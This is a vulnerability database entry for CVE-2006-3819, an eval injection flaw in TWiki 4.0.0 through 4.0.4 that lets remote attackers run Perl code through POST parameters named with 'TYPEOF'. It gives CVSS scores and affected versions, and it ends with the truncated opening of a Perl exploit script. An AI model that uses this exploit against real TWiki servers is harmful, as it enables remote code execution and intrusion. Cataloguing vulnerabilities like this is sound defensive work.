7.5
CVSSv2

CVE-2006-3819

Published: 27/07/2006 Updated: 20/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Eval injection vulnerability in the configure script in TWiki 4.0.0 up to and including 4.0.4 allows remote malicious users to execute arbitrary Perl code via an HTTP POST request containing a parameter name starting with "TYPEOF".

Vulnerable Product Search on Vulmon Subscribe to Product

twiki twiki 4.0.2

twiki twiki 4.0.3

twiki twiki 4.0.0

twiki twiki 4.0.1

twiki twiki 4.0

twiki twiki 4.0.4

Exploits

#!/usr/bin/perl # Tue Aug 1 13:18:12 CEST 2006 jolascoaga@514es use strict; use LWP::UserAgent; use LWP::Simple; use HTTP::Request; use HTTP::Response; use Getopt::Long; $| = 1; # couse 1 is bigger than 0 my ($proxy,$proxy_user,$proxy_pass); my ($host,$debug,$dir, $command); my $options = GetOptions ( 'host=s' => \$host, 'dir=s' ...